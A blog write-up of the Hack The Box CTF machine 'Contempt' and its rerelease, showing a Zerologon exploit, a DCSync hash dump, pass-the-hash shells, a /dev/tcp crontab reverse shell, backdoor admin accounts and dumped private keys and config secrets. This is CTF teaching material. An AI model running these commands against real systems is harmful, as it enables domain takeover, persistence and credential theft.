← Back to blog

Contempt

Overview

Contempt is a FullPwn challenge from the Hack The Box Business CTF 2023. FullPwn challenges ship with no description: we get an IP address and are expected to retrieve both the user and root flags.

The intended path was an Active Directory / ADFS chain: abuse SAML single sign-on against the ADFS instance to compromise a Nextcloud user, then phish a domain user (aria.frost) who has a service that automatically opens PDFs in a vulnerable build of Adobe Acrobat Reader (2022.003.20258), leading to code execution on the DC.

In practice I solved both the original Contempt machine and its Contempt - Revenge rerelease through unintended means:

  • Contempt (original): the Domain Controller was vulnerable to Zerologon. Resetting the machine account password to empty allowed a DCSync, and the writable NETLOGON share gave code execution and the root flag. The user flag lived inside a .vhdx file on disk.
  • Contempt - Revenge: Zerologon was patched, but one Domain Admin (echo.rivers) still used an NTLM hash recovered from the original box. Pass-the-hash against the writable NETLOGON share again yielded both flags.

This writeup walks through the unintended solves and then captures the deeper enumeration of the ADFS / Nextcloud / Hyper-V environment that explains the intended path.

Recon

A full TCP port scan immediately identifies a Windows Active Directory Domain Controller. Note the SSL certificate on port 443 carries a Subject Alternative Name for nextcloud.contempt.htb, hinting at a Nextcloud instance fronted by the same host.

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-07-15 19:03:58Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: contempt.htb, Site: Default-First-Site-Name)
443/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2023-07-15T19:05:27+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=contempt.htb/organizationName=Contempt
| Subject Alternative Name: DNS:nextcloud.contempt.htb
| Not valid before: 2023-05-18T17:43:41
|_Not valid after:  2073-05-18T17:53:41
|_http-title: Not Found
445/tcp   open  microsoft-ds      Windows Server 2016 Standard 14393 microsoft-ds (workgroup: CONTEMPT)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
2179/tcp  open  vmrdp?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: contempt.htb, Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
9389/tcp  open  mc-nmf            .NET Message Framing
49666/tcp open  msrpc             Microsoft Windows RPC
49668/tcp open  msrpc             Microsoft Windows RPC
49669/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc             Microsoft Windows RPC
49719/tcp open  msrpc             Microsoft Windows RPC
57830/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc01
|   NetBIOS computer name: DC01\x00
|   Domain name: contempt.htb
|   Forest name: contempt.htb
|   FQDN: dc01.contempt.htb
|_  System time: 2023-07-15T12:04:49-07:00

The 2179/vmrdp port (Hyper-V VMConnect) and the SPNs we later enumerate confirm DC01 is also a Hyper-V host. The Nextcloud instance is reachable over port 443 at nextcloud.contempt.htb.

Exploitation: Zerologon (Contempt)

Whenever a fresh Domain Controller is in scope, a quick high-value check is Zerologon (CVE-2020-1472). CrackMapExec flags DC01 as vulnerable, so I cloned the risksense PoC and attempted to reset the machine account password to empty.

./set_empty_pw.py DC01 contempt.htb

The exploit takes a while to land (enough that it looks like a false positive at first), but it eventually succeeds and sets the DC01$ machine account password to empty.

With an empty DC01$ password, we can perform a DCSync over DRSUAPI using secretsdump.py and dump every hash in the domain. The -no-pass flag authenticates as the machine account with the now-empty password.

secretsdump.py -just-dc -no-pass DC01\$@contempt.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6c8f447c25487adc9148b0a90036c6a8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d8d6f9644b7ef09c5c9d12d01a18bc7a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
contempt.htb\svc-ldap:1104:aad3b435b51404eeaad3b435b51404ee:b6fa6cd30819a545a7f12a76b54b6e84:::
contempt.htb\seraphina.blake:1601:aad3b435b51404eeaad3b435b51404ee:2f320b121f6ae368a35ba9819e0d2516:::
contempt.htb\phoenix.reed:1602:aad3b435b51404eeaad3b435b51404ee:8213160e905b6817df4ee0c2c8b48e12:::
contempt.htb\cipher.stone:1603:aad3b435b51404eeaad3b435b51404ee:a5e12330358741a01370caf5dc316f86:::
contempt.htb\zero.summers:1604:aad3b435b51404eeaad3b435b51404ee:b8e7d7f4e6361c680c24f0a7bdd6e92a:::
contempt.htb\viper.hollow:1605:aad3b435b51404eeaad3b435b51404ee:744574681328753ff5c843b8d3c100a2:::
contempt.htb\matrix.cross:1606:aad3b435b51404eeaad3b435b51404ee:2c03a59578699559cc2940d712fd964d:::
contempt.htb\orion.swift:1607:aad3b435b51404eeaad3b435b51404ee:928e41a48e0597ec9747c7b6b9fd86db:::
contempt.htb\aria.frost:1608:aad3b435b51404eeaad3b435b51404ee:9d0827ca3f062bddb35f88bc5bf15158:::
contempt.htb\echo.rivers:1609:aad3b435b51404eeaad3b435b51404ee:a7be11b5be8bb84196edbd0e8c0bc9ea:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-adfs$:1103:aad3b435b51404eeaad3b435b51404ee:b62f7224fe2c58991ed0b7f29fcb2734:::
[*] Kerberos keys grabbed
<snipped>

With the Administrator NTLM hash in hand, a pass-the-hash share enumeration confirms the DC is fully compromised.

crackmapexec smb contempt.htb -u administrator -H 6c8f447c25487adc9148b0a90036c6a8 --shares

Interestingly, C$ and ADMIN$ are not writable (or not present). The only writable share is NETLOGON. smbexec.py supports specifying which share the payload is staged from via the -share flag, so we point it at NETLOGON to get execution.

smbexec.py contemp.htb/[email protected] -hashes :6c8f447c25487adc9148b0a90036c6a8 -share NETLOGON

This gives a semi-interactive shell on DC01 as Administrator, from which we read the Administrator desktop flag (the root flag for this challenge):

HTB{good_d@y_For_PhiSH1N6_On_mARS}

Privilege De-escalation: Finding the User Flag (Contempt)

Curiously, the user flag is not present anywhere reachable through the semi-interactive shell. To get richer access I staged a Havoc C2 implant and caught a reverse shell, then recursively searched the entire filesystem for the HTB{ flag pattern.

shell powershell -command "ls -fo -r \ -erroraction silentlycontinue | sls -pattern 'HTB{' -erroraction silentlycontinue"

After a while the search returns the user flag from inside a .vhdx virtual hard disk file — the guest VM where the “user” actually lives:

HTB{aDFs_K1LLcHAIn_put5_y0U_oN_clOuD9}

Contempt - Revenge: Hash Reuse

Because the original Contempt shipped with the unintended Zerologon vulnerability, HTB released a patched rerelease, Contempt - Revenge.

It is the same Domain Controller, so the first thing I tried was reusing the hashes harvested from the original box. Surprisingly, not every account had been rotated — one of the Domain Admins, echo.rivers, still had a working NTLM hash. CrackMapExec confirms it authenticates and that NETLOGON is again writable.

crackmapexec smb contempt.htb -u echo.rivers -H a7be11b5be8bb84196edbd0e8c0bc9ea --shares

Foothold via smbexec on NETLOGON

As before, we use smbexec.py staging from the writable NETLOGON share to execute commands as echo.rivers.

smbexec.py contemp.htb/[email protected] -hashes :a7be11b5be8bb84196edbd0e8c0bc9ea -share NETLOGON

This yields the Administrator desktop flag right away:

HTB{HeY_iv3_g0n3_phIsHINg_leav3_4_meSs4g3}

Privilege De-escalation Again

Repeating the approach from the original box, I caught a Havoc reverse shell and ran the same recursive flag-pattern search across the filesystem.

shell powershell -command "ls -fo -r \ -erroraction silentlycontinue | sls -pattern 'HTB{' -erroraction silentlycontinue"

This returns the Revenge user flag (alongside the stale flag carried over from the original machine):

HTB{1_nEveR_cL41m3D_t0_Be_4n_ss0_exPERt}

Appendix: Full NMAP Scan

The complete -p- -sC -sV scan for reference. This confirms the same service set and shows SMB message signing is enabled and required.

Nmap scan report for contempt.htb (10.129.251.205)
Host is up (0.021s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-07-18 10:15:04Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: contempt.htb, Site: Default-First-Site-Name)
443/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2023-07-18T10:16:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=contempt.htb/organizationName=Contempt
| Subject Alternative Name: DNS:nextcloud.contempt.htb
| Issuer: commonName=contempt-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-18T17:43:41
| Not valid after:  2073-05-18T17:53:41
| MD5:   ed1a:f45e:8acf:2fd5:95fc:3d5f:7258:896d
|_SHA-1: 2168:1396:d6a3:d892:b709:32db:9a56:078c:c3bc:0b5a
445/tcp   open                    Windows Server 2016 Standard 14393 microsoft-ds (workgroup: CONTEMPT)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
2179/tcp  open  vmrdp?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: contempt.htb, Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
9389/tcp  open  mc-nmf            .NET Message Framing
49666/tcp open  msrpc             Microsoft Windows RPC
49668/tcp open  msrpc             Microsoft Windows RPC
49669/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc             Microsoft Windows RPC
49719/tcp open  msrpc             Microsoft Windows RPC
49738/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc01
|   NetBIOS computer name: DC01\x00
|   Domain name: contempt.htb
|   Forest name: contempt.htb
|   FQDN: dc01.contempt.htb
|_  System time: 2023-07-18T03:15:56-07:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-07-18T10:15:53
|_  start_date: 2023-07-18T10:13:17
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 1h45m01s, deviation: 3h30m02s, median: 0s

Appendix: Nextcloud and ADFS SSO

The Nextcloud login page offers a SAML “SSO For Operators” backend that redirects through ADFS. These are the relevant SSO endpoints.

https://nextcloud.contempt.htb/apps/user_saml/saml/selectUserBackEnd?redirectUrl=

The IdP-initiated SSO request fired off to the ADFS server:

https://adfs.contempt.htb/adfs/ls/idpinitiatedsignon.aspx?SAMLRequest=nZJbbxoxEIXf%2BRWR39kbm4VYgERCL0gUUCB9yEvkXc8GS7u26xm35N938bbNRUoeOg%2BWfDzn08yRpyjaxvKFp6O%2BhR8ekAYXXZ3aRiMPjzPmneZGoEKuRQvIqeL7xbc1z6KEW2fIVKZhb2wfuwQiOFJG97bVcsa2m0%2Fr7ZfV5mFSFJM0L7KrIktEWeRSijKp0gRSCcVoNBFXl3VdZnlv%2FQ4OO86MdVg26GmIHlYaSWjq9CQbDZPxMJ0c0jG%2FHPM8v%2B%2Bty25ZpQUF%2B5HIIo9jIWuMKqMJWkvRkcqgxA3GSlqlFSlBIFE9aqMjgfbUs3Z%2FYrhWWir9%2BPH2Zd%2BE%2FOvhsBvutvtDD1n8TeXGaPQtuD24n6qCu9v184AaTlQ1xss3U1qLse%2F8D%2Bf043CICtk8kKfnOw%2FBuPl%2FkFogIQWJafwS9Iy2fNNtuVruTKOqp6Cf67NxraD3w0ijNChKDuvQyr1GC5WqFUj2D7NoGvPrxkGX%2FIyR88Au4vmgn%2BX1353%2FBg%3D%3D&RelayState=https%3A%2F%2Fnextcloud.contempt.htb%2Fapps%2Fuser_saml%2Fsaml%2Flogin

The internal Nextcloud VM is reachable at 172.16.20.20.

https://172.16.20.20/

image

image

Appendix: RDP and the Hyper-V Backdoor

With Administrator on DC01, one route to the underlying Hyper-V guest is to create a local/domain account, enable RDP, log in, open Hyper-V Manager, and edit the guest’s boot. These are the account-creation and RDP-enable commands used.

cmd /c net user pwn Password123! /add
cmd /c net localgroup Administrators pwn /add
cmd /c net localgroup "Remote Desktop Users" pwn /add
cmd /c net localgroup "Remote Management Users" pwn /add

# Domain
cmd /c net user pwn Password123! /add /domain
cmd /c net localgroup "Remote Desktop Users" pwn /add /domain
cmd /c net localgroup "Remote Management Users" pwn /add /domain
cmd /c net group "Domain Admins" pwn /add /domain
cmd /c net group "Enterprise Admins" pwn /add /domain
cmd /c net group "Schema Admins" pwn /add /domain
cmd /c net group "Group Policy Creator" pwn /add /domain

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

Then connect over RDP with FreeRDP (the first attempts show a LOGON_FAILED_OTHER while credentials/policy settle):

xfreerdp /u:pwn /p:'Password123!' /v:contempt.htb
[13:06:47:876] [29753:29754] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Eastern
[13:06:47:177] [29753:29754] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[13:06:47:177] [29753:29754] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[13:06:47:193] [29753:29754] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[13:06:47:194] [29753:29780] [INFO][com.freerdp.channels.rdpdr.client] - Loading device service drive [share] (static)
[13:06:47:194] [29753:29754] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[13:06:48:863] [29753:29754] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[13:06:48:651] [29753:29780] [INFO][com.freerdp.channels.rdpdr.client] - registered device #1: share (type=8 id=1)

Inside Hyper-V Manager, restart the Nextcloud guest and break into its boot. This recovers a root shell on the Linux guest where the user flag lives:

  • At the grub start, press “e” to edit the startup config
  • add init=/bin/bash
  • Continue the boot so you have a root shell
  • cat /root/user.txt

Crontab Backdoor

Once on the Linux guest, a crontab reverse-shell backdoor provides persistence; catch it with netcat and read the user flag.

crontab -e
*/10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196

nc -nlvp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.251.205:49676.
bash: cannot set terminal process group (735): Inappropriate ioctl for device
bash: no job control in this shell
[root@nextcloud ~]#

[root@nextcloud ~]# ls -la
total 40
dr-xr-x---.  3 root root 4096 Jul 18 13:33 .
dr-xr-xr-x. 18 root root  251 Jul 18 13:27 ..
lrwxrwxrwx.  1 root root    9 May 25 08:43 .bash_history -> /dev/null
-rw-r--r--.  1 root root   18 May 11  2022 .bash_logout
-rw-r--r--.  1 root root  141 May 11  2022 .bash_profile
-rw-r--r--.  1 root root  429 May 11  2022 .bashrc
-rw-r--r--.  1 root root  100 May 11  2022 .cshrc
-rw-------.  1 root root   20 May 18 15:27 .lesshst
lrwxrwxrwx.  1 root root    9 May 25 08:42 .mysql_history -> /dev/null
drwx------.  2 root root    6 Jul 18 13:26 .ssh
-rw-r--r--.  1 root root  129 May 11  2022 .tcshrc
-rw-------.  1 root root  850 Jul 15 10:47 .viminfo
-rw-------.  1 root root 1156 May 16 13:03 anaconda-ks.cfg
-rw-r-----.  1 root root   41 Jul 15 10:47 user.txt
[root@nextcloud ~]# cat user.txt
HTB{1_nEveR_cL41m3D_t0_Be_4n_ss0_exPERt}

SSH Backdoor

Alternatively, dropping a public key into authorized_keys gives clean SSH access as root to the Nextcloud guest.

[root@nextcloud ~]# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDeyTyECqPLWrtqMbEfHQcHEQbS9Y13gYZM7z3+rY6qCOwrdZjDjmptiDlOup8GgguvoYHIiPC6Hut3PrPemUpy47hHl58zXMwoTrCJeDG69HV/YIBJ6eYntFH05zBbOOHehxVNSCzfNMy65eVCZgrRYFXeA7lzhUHMjtqC2+Ou1a68WQ/ONAe0YMLKSkYfixvwifvVdv4GZuBHrNlGdF9cZu+/suFzXKOsm0wGCpnyxhSqn2uy8Dp7bGS9FQruXVHGgz8BQKA5NxF8c4AHt0l1E3f5lavsDUty1mf6ufw5TE0zG6jGfA7Pr6E8EEFpy7b4AKiENG9oRWk965Te5DRpdKA6y88uSQ6bzMksbvCM5QQf/le3BerTsowiEdnuI6ilVUrydh3cMitHk803WZODok6OFrGbIVMuCAv24E5Q6ipCWCl+tuJcrtL8erj4jaR52SPycHY63LtRf89zXqs0PZdva22S/MLNd+j2H4b2pjPJ3z5sf1riiNLJVjoxo0=" >> ~/.ssh/authorized_keys
 ssh [email protected]
Warning: Permanently added '172.16.20.20' (ED25519) to the list of known hosts.
Last login: Sat Jul 15 12:28:08 2023 from 172.16.20.1
[root@nextcloud ~]#

image

image

image

image

Appendix: Nextcloud Guest Enumeration

Host and DNS configuration on the Nextcloud guest reveals the internal network layout — the DC, ADFS, and mail server all live on 172.16.20.1.

╔══════════╣ Hostname, hosts and DNS
nextcloud.contempt.htb
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
172.16.20.1 adfs.contempt.htb mail.contempt.htb dc01.contempt.htb
search contempt.htb
nameserver 172.16.20.1
contempt.htb

MySQL user authentication strings from the local database:

User    Host    authentication_string
mariadb.sys    localhost
root    localhost    *8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14
mysql    localhost    invalid
nextcloud    localhost    *43A3A08588FD297EFFE89D2C4F108FDFA67C6325

Full linpeas output (root) is archived here:

View linpeas.sh (root) output

echo.rivers GnuPG Private Keys

The echo.rivers home directory on the Nextcloud guest contains exported GnuPG private keys.

/home/echo.rivers/.gnupg/private-keys-v1.d/5DB4D1317999333A618EBC8798B2C12A1A17F101.key
/home/echo.rivers/.gnupg/private-keys-v1.d/ED1F31222B3549CF9D0A5B8224AA600251DE1E3A.key

[root@nextcloud config]# cat /home/echo.rivers/.gnupg/private-keys-v1.d/5DB4D1317999333A618EBC8798B2C12A1A17F101.key
Created: 20230525T123924
Key: (private-key (rsa (n #00AF6E54B4DB5A6DEEE7DC26A0195E102208E2147DB3
 9F69CCCE8B66BB583EB35AACAD29563208EF0774FCEE4530A24674FDB59C9131386939
 338F22F3A96962FF2B8D1B86A2D3D9AECA618D8B8585725679E6B91F3C55D720B06B29
 52DCCEEDCC66BD54AA205683ABDE7C9EDB2E63EB42478B99674F31D1A2B7A5A69247BE
 877A1A02F8D1B80F445D20C59CF190EB0C1E2CAD00D8DC518C13550025DE93E8997214
 2B0D0BA50399F761EE7989ADB5A2F4EEAA199B4E7C60CC9F2F21BFB1981CD2FB675EA9
 C166FF66F8B71348B67D63439D950C447BD643EE07D461B76F814A5F67C64AA1C548CC
 C2AED8EA170FE1FD3195180D56199011E7BC54E96A966333DDFF5CBB07908161C18A22
 EB91EA0BDB80F426970DA9FE914AC76FDA34F500D2E5E4A0A5ACFF140E1DBB405AA04C
 3B8F9CBBA19987662608838EA93DD90BB49BA9230EE008DDF3B3E0C7E2CEA0CA4974B0
 EEE7F62E83862FBCF1D5C8199D7D862C4E359E26B793C02384E6C53282CE332EC647A7
 520706901F10F10A25FF717289#)(e #010001#)(d
  #0C63EDC22752FBFC396E8C60D6E1D4A05EC1BF0240CF43CCF61294F32AF0A4C0C4FC
 E6F4424CECBAF9598AE7A29F777BF8565D2449166BA22160DCEE5A3B0A05AD3906666C
 362BC40361BFFA48782C22ECF1AD86060027155538805EEC9F05DF1FAB84210EEF2556
 1C7CEF485A3EAEE54BC1D19821190AEE23EBE477A4EF1148FFB0D18B986525A631341B
 D958EBACFBAD9A9B7A759721DE54ACD1BFE670F17383F6A5717ADA6603B9AC3AF3CD2B
 CCC2615FECB69224C93E7288C4E8B1DDA53D6896A3011C8836305605BB4F889731FC35
 66AD0030504DC37D81F04F759B724193DCFD697A31D80B259961C9A233A097FEF02618
 00CEACA672FC1EAACB17EFEC9ACDC980C4F2E87318CB4285254CD3255885E072238F23
 88ECF5A74D362C559801C93A674B5DA6CBA4C1BA6EAC4E5509AE1BE96AD6691D68F932
 9AF8A1521A7F298D539D0D73F262D3D48C7D293AAC4D3EEC5FB4FC4A11933D0FE504D8
 E82084DFCBF311CFAD943B25A49398A03E1A6CF926260B1CEDDE1709A749BDEB60B05D
 #)(p #00CD84E057AF8DA36882CEEECB72BB43A6545AA7A7032ED69F7E92B91CE8EE1B
 094D47185B2E1DD9A28ED3A80AEB989BD243C71A359E306E8569A6ECCC76F5A027DFB5
 76F0778155F490C6F16F7044424BB070B9E66E43729D95B191977F4EEA1DE6AA24609B
 0A311593A9162CC8EFB257C72D45858C7160CC6AD5A4617E34E22543D20F0A628274BB
 8563CF60C31477AD42F0957ACBFFCC99691E563DA64255BEA7F94EEA106057341AA0A3
 BEC967BF37CB0B19767BC2E6BDC9241E6114B10875#)(q
  #00DA85811604C762E797EE2E202960D5CCA27C4132E460AF88AD0B311785DFFFD72E
 AA8A9DAA295FC68FE76D2872087D4F2383B111951145706B2D36044D0B0C27213FDA7E
 3F389330D48F8BFF3A4DA303FA2069E13A94F076E23549EFA1FE309B01C0921C3ED1FB
 285714200D1985B93C8A49D9EE95EA96C251D9DE0FCB9F73FAEAA52822DB3BB807C882
 B66D6FC260B1EA91113BFE09AA2D4634011E0C1C5FAC8066E011FBFA5A399A1A09C508
 A0C0252F93D1314FE4D2E102DEDC2236641F45#)(u
  #00CE6045B67EB82D3BCFC208E7C36AB09727DE1341510822C59465ED7AD12475F93C
 8E9F7E76F9D2DDFB63E1D2925C69842369FC38AB88D67F11289BC6A4B787162F5DC4E5
 86446660A28C1B46A71274C08A2C5F45C8F896CB1402753D9A0D9CF899C1F6CDF13519
 17C5E2A79A6F76DDD9137FEA539B331A5922C8F8742913D3235C2F761E478F16D51903
 AED720E8B4A5EC833C05E443E8B559DA86FDED52198F046ED4E1A8AEE03697A7F30D77
 BC5D8BA43D6A14BBBD0234939B4737F36EBF6B#)))

[root@nextcloud config]# cat /home/echo.rivers/.gnupg/private-keys-v1.d/ED1F31222B3549CF9D0A5B8224AA600251DE1E3A.key
Created: 20230525T123924
Key: (private-key (rsa (n #00E4E58E342C19B9EE3E6C7A07375F14DC5F464D1FA5
 002AA8D78561CA5FB53A3D3380E27DBCA9A30651DCB65759EEE74DE6A6E116AC64A8F4
 F72EB8C4C3992DCF032E751D6940BBD13B766B0A2C38376BADD0393855CBD5A13B7FF9
 AE871BA5A967F143D568D0AED953DC4336EA713C56D8E1B810CD33C1A047D8721642AC
 D4FC0477FE61126CF255570ED35B1DC4FDB359E99B4B2DD7E71768CACB0A34282BAE24
 8B3657A9A460E053165B2BC95C30202D287EE781EFCF9B3A49D56D822EE98426FCE55E
 C9241699DFAE78F7AE567478E7555B0E31F68188C4424D4B1E8CB153258A8359266CB9
 0FFA5AC088D2662EC5F27F61121FBE99C040C20D1580F9B3DA181AA1FC83D9115574BB
 CDE73ADEB6DBEE1873FC8340323095A432346EADAD653D680C4C6952F9CEBC6712515F
 B933982AE8CA52E7E98C8277057DBF6D700632C85301D79947FF97662AD5186CB6EFA9
 22F0B98A5233C6C2FA5D5E26622CE1646E43E8AEB0EF521EAD61FBC7932502D119CD38
 23053AA39A255DF3CF8958C29F#)(e #010001#)(d
  #1971EB524C14BAB68BF9EDC174F0FCEB57D6AE26CBBB83AD2BF2DD36C202436C74ED
 3EEAFB58B5915E484AD22B0D2E695A8547EB07FEFDF3E8067EEE60A55BE79CA842C74C
 E15AAA47BC97943F40D5E857CA18924AA1FE2838EA610C7B0DCD11FD46B4B90F3878E2
 1A906C6863BCC8185F6E62D27B52903E61138E9B2AE3A0F43860491C416570604C428E
 FC475D9400FC08715AF4C8561D7968BC6970A2DBE2DFED19D2BA3E565BEEE09801FB6B
 0EC3DA41462F8B77927C8F08E6263B9D3B6D5F94CDA6C568124C87D6A4DCCAB125515B
 5E97F4B1063F0DE5721C35C8026BC8A06462307B96C4AAC66DE04C3DC21AB53150CBAB
 147FCA035BF30D49E42923D4142128D3CDC7A3EA1BC7EEE7E8DFD9ED5FF441D6FB6E6E
 0C36D59196D151BE4282F49398813079A0C73B7FA120F2EA76F695082CDC9A1CAE667C
 0887EB84E530AFD68DFB43CD88534DA5963DAEA81F33BFDA2AC1D37257DEC8A5CF64E5
 F76D140AC0596EF2D18C5DFAAC24F1B70441989266F96F68DC6579DE96E431AC0DDB01
 #)(p #00EE6FF19E7295D855AB31AE5E8574BEFA2BA7C2BAB9D5D493661C36D14B1210
 437F69601BD745F98D0E56B5FD58A8A2455C3270EEB3DFF1C461957E129447D66F0C98
 521872E0BD36C5ECE56805E169661226713580C8C641EC4523DCAADFD49B686513DB48
 98F6C0BE770C506A008840BA333FB1A0BB1A24DC994AAFE835D7778419ED618D84BB6F
 276DA21A2EB29CF7AEF1F5DD2561787332B7D1440EFB5CAE9334BEFDA0C7E89D8A4F5C
 F88F0730928AC4158D117566CF6E466A1B88B036EB#)(q
  #00F5C1B60FE11757C798D3AD6DE24D17FBE5D8C50051B309F475C313F31E577351F0
 42C7CCF1313BE57BD433FB3D43FF808A1891D4543FC93B61928F1E6C36A4EB23E01F8D
 7055693C4DD8A718CBC49B55171BED6487561AC90223E9ECD6FE6681D3136B6D062C83
 62AB9BD2C5B7EBFE342BB2363AC8FF74B0B38B280D510D5DF31FFC6FAA452CE9CC0484
 77184EAE00C0DA94B1738431DC83DC799A004F33191C17D00BEB1AA1A18E620FA2A1CE
 1ED49ACF85288BC061683CE43B0C369E191E1D#)(u
  #6F2488C3F77BA0611F1995DD20E13518861090EC877ECF03D098730071EE99A57244
 DCAF86E2CCE32D2C9EA286339A43A9E202BA4993E8267920F4A724B02FDF4CC3563A54
 BBCA7206CB8B162E22F81DEA193938999376FF25E5A4AF1218F3A8510DDDBFC809215F
 2C7C312D7D79CB2E96D1AF60590EBD186F95C9DFA8CAA25D0D9A9BBB6E89FD75ACE373
 B74E242DF1E835E5A04B4CA3E32BECE8AF7B12BA748C75C07E8BDA904C6163DFF44AF1
 F28F7AD71496ECF4E796168BEB3C355C072E#)))

Nextcloud Configuration

The Nextcloud config.php exposes the DB credentials, instance secret, and confirms the installed version is 26.0.1.1.

[root@nextcloud config]# cat config.php
<?php
$CONFIG = array (
  'instanceid' => 'ocn84ru3dmie',
  'passwordsalt' => 'ZbwXq27T4qfGqqipdugBoXU5Dn+OjN',
  'secret' => 'GkaxhLdBvjP/wiboFIXswr56UVJjqKZS2oZYELJTsLwnwZ6G',
  'trusted_domains' =>
  array (
    0 => 'nextcloud.contempt.htb',
  ),
  'datadirectory' => '/var/www/html/nextcloud/data',
  'dbtype' => 'mysql',
  'version' => '26.0.1.1',
  'overwrite.cli.url' => 'https://nextcloud.contempt.htb',
  'htaccess.RewriteBase' => '/',
  'dbname' => 'nextclouddb',
  'dbhost' => 'localhost',
  'dbport' => '',
  'dbtableprefix' => 'oc_',
  'mysql.utf8mb4' => true,
  'dbuser' => 'nextcloud',
  'dbpassword' => 'DhENL2JvRz5sTX',
  'installed' => true,
  'allow_local_remote_servers' => true,
  'upgrade.disable-web' => true,
  'lost_password_link' => 'disabled',
  'auth.webauthn.enabled' => false,
  'auth.bruteforce.protection.enabled' => false,
  'app_install_overwrite' =>
  array (
    0 => 'cfg_share_links',
  ),
  'ldapProviderFactory' => 'OCA\\User_LDAP\\LDAPProviderFactory',
);

[root@nextcloud nextcloud]# mysqldump nextclouddb > database_dump.txt

[root@nextcloud nextcloud]# cat version.php
<?php
$OC_Version = array(26,0,1,1);
$OC_VersionString = '26.0.1';
$OC_Edition = '';
$OC_Channel = 'stable';
$OC_VersionCanBeUpgradedFrom = array (
  'nextcloud' =>
  array (
    '25.0' => true,
    '26.0' => true,
  ),
  'owncloud' =>
  array (
    '10.11' => true,
  ),
);
$OC_Build = '2023-04-19T15:42:43+00:00 8cfcb8e2a2f9ba1bbe993161f00d7dcebf07708f';
$vendor = 'nextcloud';

ADFS SAML Configuration

The oc_user_saml_configurations table from the database dump contains the full “SSO for Operators” SAML configuration — including the service-provider certificate and private key plus the IdP signing certificate — which is central to the intended ADFS attack chain.

LOCK TABLES `oc_user_saml_configurations` WRITE;
/*!40000 ALTER TABLE `oc_user_saml_configurations` DISABLE KEYS */;
